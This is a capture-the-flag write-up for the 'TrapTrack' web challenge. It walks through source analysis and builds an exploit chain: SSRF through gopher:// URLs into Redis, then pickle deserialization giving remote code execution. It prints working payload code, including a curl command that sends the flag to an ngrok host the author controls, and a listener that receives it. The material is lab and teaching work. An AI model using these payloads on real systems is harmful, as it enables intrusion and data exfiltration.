TrapTrack




We are given a website like this:

We are also given the source code of the project.

Website functionality

The web application allows us to enter URLs that will be stored in a SQLite3 database. Just by reading the code in challenge/application/config.py, we find valid credentials (admin:admin):

```python
from application.util import generate
import os


class Config(object):
    SECRET_KEY = generate(50)
    ADMIN_USERNAME = 'admin'
    ADMIN_PASSWORD = 'admin'
    SESSION_PERMANENT = False
    SESSION_TYPE = 'filesystem'
    SQLALCHEMY_DATABASE_URI = 'sqlite:////tmp/database.db'
    REDIS_HOST = '127.0.0.1'
    REDIS_PORT = 6379
    REDIS_JOBS = 'jobs'
    REDIS_QUEUE = 'jobqueue'
    REDIS_NUM_JOBS = 100


class ProductionConfig(Config):
    pass


class DevelopmentConfig(Config):
    DEBUG = True


class TestingConfig(Config):
    TESTING = True
```



So we can access the main panel:



The web application allows us to store some websites:



As can be seen, new websites have a red dot, which indicates that the website is not active or has not been tested yet. Under the hood, the worker takes the URL and performs a request. If the response is successful, the dot turns green:



Moreover, using Burp Suite, we can see that the frontend performs AJAX requests to check the health of the listed websites:

Application infrastructure

Source code analysis

There are a lot of files to analyze:

```
$ tree
.
├── Dockerfile
├── build-docker.sh
├── config
│   ├── readflag.c
│   ├── redis.conf
│   └── supervisord.conf
├── challenge
│   ├── application
│   │   ├── blueprints
│   │   │   └── routes.py
│   │   ├── cache.py
│   │   ├── config.py
│   │   ├── database.py
│   │   ├── main.py
│   │   ├── static
│   │   │   ├── css
│   │   │   │   ├── bootstrap.min.css
│   │   │   │   ├── login.css
│   │   │   │   ├── main.css
│   │   │   │   └── theme.css
│   │   │   ├── images
│   │   │   │   └── logo.png
│   │   │   └── js
│   │   │       ├── auth.js
│   │   │       ├── bootstrap.min.js
│   │   │       ├── jquery-3.6.0.min.js
│   │   │       └── main.js
│   │   ├── templates
│   │   │   ├── admin.html
│   │   │   └── login.html
│   │   └── util.py
│   ├── flask_session
│   ├── instance
│   ├── requirements.txt
│   ├── run.py
│   └── worker
│       ├── healthcheck.py
│       └── main.py
└── flag.txt

13 directories, 27 files
```

Moreover, two separate programs run at the same time: a Flask server (in application) and a worker (in worker).

Finding the objective

Looking at the Dockerfile, we see that flag.txt is copied to /root/flag and that a SUID binary called /readflag lets us read the flag, as long as we can execute commands on the server. Therefore, the aim of this challenge is to obtain Remote Code Execution (RCE) to read the flag:

```dockerfile
FROM python:3.8.14-buster

# Install packages
RUN apt-get update \
    && apt-get install -y supervisor gnupg sqlite3 libcurl4-openssl-dev python3-dev python3-pycurl psmisc redis gcc \
    --no-install-recommends \
    && rm -rf /var/lib/apt/lists/*

# Upgrade pip
RUN python -m pip install --upgrade pip

# Copy flag
COPY flag.txt /root/flag

# Setup app
RUN mkdir -p /app

# Switch working environment
WORKDIR /app

# Add application
COPY challenge .
RUN chown -R www-data:www-data /app/flask_session

# Install dependencies
RUN pip install -r /app/requirements.txt

# Setup config
COPY config/supervisord.conf /etc/supervisord.conf
COPY config/redis.conf /etc/redis/redis.conf
COPY config/readflag.c /

# Setup flag reader
RUN gcc -o /readflag /readflag.c && chmod 4755 /readflag && rm /readflag.c

# Expose port the server is reachable on
EXPOSE 1337

# Disable pycache
ENV PYTHONDONTWRITEBYTECODE=1

# Run supervisord
CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]
```

Moreover, all directories are owned by root except for /app/flask_session (which is interesting, and reminded me of Acnologia Portal from HTB Cyber Apocalypse 2022). This matters because we won’t be able to copy the flag to a publicly accessible directory, since we don’t have write permissions there.

Worker

I started with the worker. Basically, it connects to a Redis server that holds a message queue:

```python
import redis, pickle, time, base64
from healthcheck import request

config = {
    'REDIS_HOST' : '127.0.0.1',
    'REDIS_PORT' : 6379,
    'REDIS_JOBS' : 'jobs',
    'REDIS_QUEUE' : 'jobqueue',
    'REDIS_NUM_JOBS' : 100
}

def env(key):
    val = False
    try:
        val = config[key]
    finally:
        return val

store = redis.StrictRedis(host=env('REDIS_HOST'), port=env('REDIS_PORT'), db=0)

def get_work_item():
    job_id = store.rpop(env('REDIS_QUEUE'))
    if not job_id:
        return False

    data = store.hget(env('REDIS_JOBS'), job_id)

    job = pickle.loads(base64.b64decode(data))
    return job

def incr_field(job, field):
    job[field] = job[field] + 1
    store.hset(env('REDIS_JOBS'), job['job_id'], base64.b64encode(pickle.dumps(job)))

def decr_field(job, field):
    job[field] = job[field] - 1
    store.hset(env('REDIS_JOBS'), job['job_id'], base64.b64encode(pickle.dumps(job)))

def set_field(job, field, val):
    job[field] = val
    store.hset(env('REDIS_JOBS'), job['job_id'], base64.b64encode(pickle.dumps(job)))

def run_worker():
    job = get_work_item()
    if not job:
        return

    incr_field(job, 'inprogress')

    trapURL = job['trap_url']

    response = request(trapURL)

    set_field(job, 'health', 1 if response else 0)

    incr_field(job, 'completed')
    decr_field(job, 'inprogress')

if __name__ == '__main__':
    while True:
        time.sleep(10)
        run_worker()
```

The worker polls the Redis queue in an infinite loop (every 10 seconds). When a new job ID arrives in the queue, it is processed by get_work_item:

```python
def get_work_item():
    job_id = store.rpop(env('REDIS_QUEUE'))
    if not job_id:
        return False

    data = store.hget(env('REDIS_JOBS'), job_id)

    job = pickle.loads(base64.b64decode(data))
    return job
```

For experienced CTF players, the vulnerability here is pretty clear: there is an insecure deserialization vulnerability in pickle.loads, as long as we can control the variable data (which is read from the jobs hash in Redis, using the job_id popped from the queue).

Moreover, the worker uses a function called request, defined in challenge/worker/healthcheck.py:

```python
import pycurl

def request(url):
    response = False
    try:
        c = pycurl.Curl()
        c.setopt(c.URL, url)
        c.setopt(c.TIMEOUT, 5)
        c.setopt(c.VERBOSE, True)
        c.setopt(c.FOLLOWLOCATION, True)

        response = c.perform_rb().decode('utf-8', errors='ignore')
        c.close()
    finally:
        return response
```

The worker uses curl (well, PycURL) to perform the requests, and the Curl handle does not restrict which protocols are allowed. Again, experienced CTF players may connect the dots: when a challenge involves Redis, there is probably a Server-Side Request Forgery (SSRF) attack using the gopher:// protocol (like in Red Island from HTB Cyber Apocalypse 2022).

Flask web application

The Flask application is not that interesting once we understand the functionality and the architecture of the challenge.

The most relevant functions are probably create_job_queue and get_job_queue from challenge/application/cache.py:

```python
def create_job_queue(trapName, trapURL):
    job_id = get_job_id()

    data = {
        'job_id': int(job_id),
        'trap_name': trapName,
        'trap_url': trapURL,
        'completed': 0,
        'inprogress': 0,
        'health': 0
    }

    current_app.redis.hset(env('REDIS_JOBS'), job_id, base64.b64encode(pickle.dumps(data)))
    current_app.redis.rpush(env('REDIS_QUEUE'), job_id)

    return data

def get_job_queue(job_id):
    data = current_app.redis.hget(env('REDIS_JOBS'), job_id)
    if data:
        return pickle.loads(base64.b64decode(data))

    return None
```

These functions handle the website information submitted by the user: create_job_queue serializes the job with pickle.dumps, stores it in the jobs hash and pushes its ID to the queue, while get_job_queue retrieves a job by ID and deserializes it with pickle.loads (thus, here we have another vulnerable call).
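To make the job flow concrete, here is a minimal sketch that mimics create_job_queue and get_work_item against an in-memory stand-in for Redis. FakeRedis and create_job are hypothetical helpers (create_job takes an explicit job_id instead of calling get_job_id), and only the hset/hget/rpush/rpop behaviour used by the challenge is modelled. The last step shows why the jobs hash is the real target: whatever is written there is exactly what pickle.loads receives.

```python
import base64
import pickle


class FakeRedis:
    """Hypothetical in-memory stand-in for the few Redis commands used here."""

    def __init__(self):
        self.hashes = {}
        self.lists = {}

    def hset(self, name, key, value):
        self.hashes.setdefault(name, {})[str(key)] = value

    def hget(self, name, key):
        return self.hashes.get(name, {}).get(str(key))

    def rpush(self, name, value):
        self.lists.setdefault(name, []).append(str(value))

    def rpop(self, name):
        items = self.lists.get(name, [])
        return items.pop() if items else None


store = FakeRedis()


def create_job(job_id, trap_name, trap_url):
    # Producer (Flask side): pickle -> base64 -> jobs hash, then queue the ID
    data = {'job_id': job_id, 'trap_name': trap_name, 'trap_url': trap_url,
            'completed': 0, 'inprogress': 0, 'health': 0}
    store.hset('jobs', job_id, base64.b64encode(pickle.dumps(data)))
    store.rpush('jobqueue', job_id)
    return data


def get_work_item():
    # Consumer (worker side): pop an ID, then unpickle whatever the hash holds
    job_id = store.rpop('jobqueue')
    if not job_id:
        return False
    return pickle.loads(base64.b64decode(store.hget('jobs', job_id)))


# Normal flow: the worker gets back exactly what the Flask app stored
job = create_job(100, 'Wikipedia', 'https://www.wikipedia.org/')
print(get_work_item() == job)  # True

# Overwriting the hash entry (what the SSRF will do) changes what gets unpickled
create_job(101, 'Example', 'http://example.com')
store.hset('jobs', 101, base64.b64encode(pickle.dumps({'tampered': True})))
print(get_work_item())  # {'tampered': True}
```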

Getting RCE

The exploit for this challenge is not difficult, but it requires chaining several techniques.

Insecure deserialization in pickle

In order to get RCE from pickle.loads, we can create a Python class that implements the __reduce__ method as follows (more information at HackTricks):

```
$ python3 -q
>>> import base64, pickle
>>>
>>> class Bad:
...     def __reduce__(self):
...         return exec, ('import os; os.system("whoami")', )
...
>>> base64.b64encode(pickle.dumps(Bad()))
b'gASVOgAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIweaW1wb3J0IG9zOyBvcy5zeXN0ZW0oIndob2FtaSIplIWUUpQu'
```

Using that payload, we will execute whoami when pickle.loads is called on that serialized object:

```
>>> pickle.loads(base64.b64decode(b'gASVOgAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIweaW1wb3J0IG9zOyBvcy5zeXN0ZW0oIndob2FtaSIplIWUUpQu'))
rocky
```
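A harmless variant makes the mechanism easier to see: __reduce__ returns a callable plus its arguments, and pickle.loads simply calls it. The Harmless class below is only an illustration. Note that the class itself is not stored in the pickle (only a reference to the callable, here builtins.int, and its arguments), which is why the target process does not need the Bad class to be defined.

```python
import pickle


class Harmless:
    def __reduce__(self):
        # "To rebuild this object, call int('1337')"
        return int, ('1337',)


blob = pickle.dumps(Harmless())
print(b'Harmless' in blob)  # False: only builtins.int and its argument are stored
print(pickle.loads(blob))   # 1337: int('1337') is called during loading
```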

SSRF to Redis

Since we need to control the jobs stored in Redis, we must talk to Redis directly. To explore it, I started the Docker container locally and opened a shell inside:

```
root@6d48bc730689:/app# redis-cli
127.0.0.1:6379> KEYS *
1) "jobs"
2) "100"
127.0.0.1:6379> GET "100"
"101"
127.0.0.1:6379> HGET "jobs" "100"
"gASVeAAAAAAAAAB9lCiMBmpvYl9pZJRLZIwJdHJhcF9uYW1llIwJV2lraXBlZGlhlIwIdHJhcF91cmyUjBpodHRwczovL3d3dy53aWtpcGVkaWEub3JnL5SMCWNvbXBsZXRlZJRLAYwKaW5wcm9ncmVzc5RLAIwGaGVhbHRolEsBdS4="
```
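The value returned by HGET is just the base64-encoded pickle of the job dictionary built by create_job_queue. Decoding it locally shows the structure (this blob comes from our own test instance, so unpickling it is safe here; untrusted blobs should never be passed to pickle.loads):

```python
import base64
import pickle

# Value returned by HGET "jobs" "100" in the redis-cli session above
stored = "gASVeAAAAAAAAAB9lCiMBmpvYl9pZJRLZIwJdHJhcF9uYW1llIwJV2lraXBlZGlhlIwIdHJhcF91cmyUjBpodHRwczovL3d3dy53aWtpcGVkaWEub3JnL5SMCWNvbXBsZXRlZJRLAYwKaW5wcm9ncmVzc5RLAIwGaGVhbHRolEsBdS4="

job = pickle.loads(base64.b64decode(stored))
print(job)
# {'job_id': 100, 'trap_name': 'Wikipedia', 'trap_url': 'https://www.wikipedia.org/', 'completed': 1, 'inprogress': 0, 'health': 1}
```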

Using HSET, we can add a new entry to the hash named jobs:

```
127.0.0.1:6379> HSET "jobs" "foo" "bar"
(integer) 1
127.0.0.1:6379> HGET "jobs" "foo"
"bar"
```

However, we won’t have access to redis-cli on the challenge instance, so we need to use gopher:// with curl instead:

```
root@6d48bc730689:/app# curl 'gopher://127.0.0.1:6379/_HSET%20%22jobs%22%20%22test%22%20%22ssrf%22'
:1
^C
root@6d48bc730689:/app# curl 'gopher://127.0.0.1:6379/_HGET%20%22jobs%22%20%22test%22'
$4
ssrf
^C
```

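The command syntax is the same, but the URL path must start with an underscore (_), because curl treats the first character of a gopher path as the item type and does not send it. Moreover, special characters (namely, spaces and double quotes) must be URL-encoded. curl terminates the request with CRLF, which makes Redis execute it as an inline command.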
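Building these URLs by hand is error-prone, so here is a small helper. It is a sketch that assumes the inline-command format used above (command name first, each argument wrapped in double quotes, no quotes or line breaks inside arguments); redis_gopher_url is a hypothetical name, not part of the challenge.

```python
from urllib.parse import quote


def redis_gopher_url(command, *args, host="127.0.0.1", port=6379):
    """Return a gopher:// URL that makes curl send one inline Redis command."""
    for arg in args:
        # Double-quoted inline arguments cannot contain quotes or line breaks
        if any(c in arg for c in '"\r\n'):
            raise ValueError(f"unsupported character in argument: {arg!r}")
    inline = " ".join([command] + [f'"{arg}"' for arg in args])
    # "_" is the gopher item type (dropped by curl); the rest is percent-encoded
    return f"gopher://{host}:{port}/_" + quote(inline, safe="")


print(redis_gopher_url("HSET", "jobs", "test", "ssrf"))
# gopher://127.0.0.1:6379/_HSET%20%22jobs%22%20%22test%22%20%22ssrf%22
```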

At this point, we can submit a gopher:// URL in the website so that, when the worker requests it, a malicious pickle-serialized object gets stored in Redis. We then achieve RCE as soon as that object is deserialized.

Exploitation

With the above primitives, we can get the flag. With RCE, we can use curl to send the flag (the output of /readflag) to a server we control. This is possible because the challenge instance has Internet access (it is able to perform a web request to this blog). So, we craft this malicious pickle-serialized object:

```
$ python3 -q
>>> import base64, pickle
>>>
>>> class Bad:
...     def __reduce__(self):
...         return exec, ('import os; os.system("curl https://abcd-12-34-56-78.ngrok-free.app/$(/readflag | base64 -w 0)")', )
...
>>> base64.b64encode(pickle.dumps(Bad()))
b'gASVewAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIxfaW1wb3J0IG9zOyBvcy5zeXN0ZW0oImN1cmwgaHR0cHM6Ly9hYmNkLTEyLTM0LTU2LTc4Lm5ncm9rLWZyZWUuYXBwLyQoL3JlYWRmbGFnIHwgYmFzZTY0IC13IDApIimUhZRSlC4='
```
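The same payload can be produced from a script instead of the REPL. This sketch pins pickle protocol 4, which is the default on the challenge's Python 3.8 image, because newer Python versions may default to a different protocol and produce different bytes. EXFIL_URL is the placeholder ngrok URL from this write-up and would have to be replaced with your own listener.

```python
import base64
import pickle

# Placeholder: the ngrok URL from this write-up; replace it with your own listener
EXFIL_URL = "https://abcd-12-34-56-78.ngrok-free.app"


class Bad:
    def __init__(self, command):
        self.command = command

    def __reduce__(self):
        # When unpickled, this runs exec('import os; os.system("<command>")')
        return exec, (f'import os; os.system("{self.command}")',)


def build_payload(command):
    # Protocol 4 is Python 3.8's default; pinning it keeps the bytes reproducible
    return base64.b64encode(pickle.dumps(Bad(command), protocol=4))


# Exfiltrate the base64-encoded output of /readflag as the request path
payload = build_payload(f"curl {EXFIL_URL}/$(/readflag | base64 -w 0)")
print(payload.decode())
```

Only the command string and the callable end up in the pickle, so the instance attribute set in __init__ is just a convenience for building it.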

The URL comes from ngrok, which exposes a local HTTP server to the Internet:

```
$ python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
```

```
$ ngrok http 8000
ngrok

Announcing ngrok-rust: The ngrok agent as a Rust crate: https://ngrok.com/rust

Session Status                online
Account                       Rocky (Plan: Free)
Version                       3.2.1
Region                        United States (us)
Latency                       -
Web Interface                 http://127.0.0.1:4040
Forwarding                    https://abcd-12-34-56-78.ngrok-free.app -> http://localhost:8000

Connections                   ttl     opn     rt1     rt5     p50     p90
                              0       0       0.00    0.00    0.00    0.00
```



Now we enter the following gopher:// URL in the website:

```
gopher://127.0.0.1:6379/_HSET%20%22jobs%22%20%229999%22%20%22gASVewAAAAAAAACMCGJ1aWx0aW5zlIwEZXhlY5STlIxfaW1wb3J0IG9zOyBvcy5zeXN0ZW0oImN1cmwgaHR0cHM6Ly9hYmNkLTEyLTM0LTU2LTc4Lm5ncm9rLWZyZWUuYXBwLyQoL3JlYWRmbGFnIHwgYmFzZTY0IC13IDApIimUhZRSlC4=%22
```

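Now we need to make the application deserialize our malicious pickle payload. Since job 9999 is never pushed to the queue, the worker will not pick it up; instead, we request the status of job_id 9999, which the Flask application loads with get_job_queue (and thus pickle.loads):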

This triggers the curl command, and the flag arrives at our server:

```
$ python3 -m http.server
Serving HTTP on :: port 8000 (http://[::]:8000/) ...
::ffff:127.0.0.1 - - [27/May/2023 03:54:02] code 404, message File not found
::ffff:127.0.0.1 - - [27/May/2023 03:54:02] "GET /SFRCe3RyNHBfajBiX3F1M3Uzc19zc3JmX3B3bjRnMyF9Cg== HTTP/1.1" 404 -
```

Flag

And here’s the flag:

```
$ echo SFRCe3RyNHBfajBiX3F1M3Uzc19zc3JmX3B3bjRnMyF9Cg== | base64 -d
HTB{tr4p_j0b_qu3u3s_ssrf_pwn4g3!}
```
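Instead of decoding the request path by hand, the listener could decode it itself. This is a minimal sketch using only the standard library's http.server; decode_exfil, ExfilHandler and serve are hypothetical names, and port 8000 just matches the ngrok forwarding used above.

```python
import base64
from http.server import BaseHTTPRequestHandler, HTTPServer


def decode_exfil(path):
    """Decode the base64 blob that the payload appends to the URL path."""
    try:
        return base64.b64decode(path.lstrip("/")).decode(errors="replace").strip()
    except ValueError:  # binascii.Error (bad padding) subclasses ValueError
        return None  # noise such as /favicon.ico


class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        secret = decode_exfil(self.path)
        if secret:
            print("[+] received:", secret)
        self.send_response(200)
        self.end_headers()


def serve(port=8000):
    # Blocks forever; expose it with `ngrok http 8000` as above
    HTTPServer(("", port), ExfilHandler).serve_forever()
```

Calling serve() would take the place of python3 -m http.server, so the decoded flag is printed directly in the terminal.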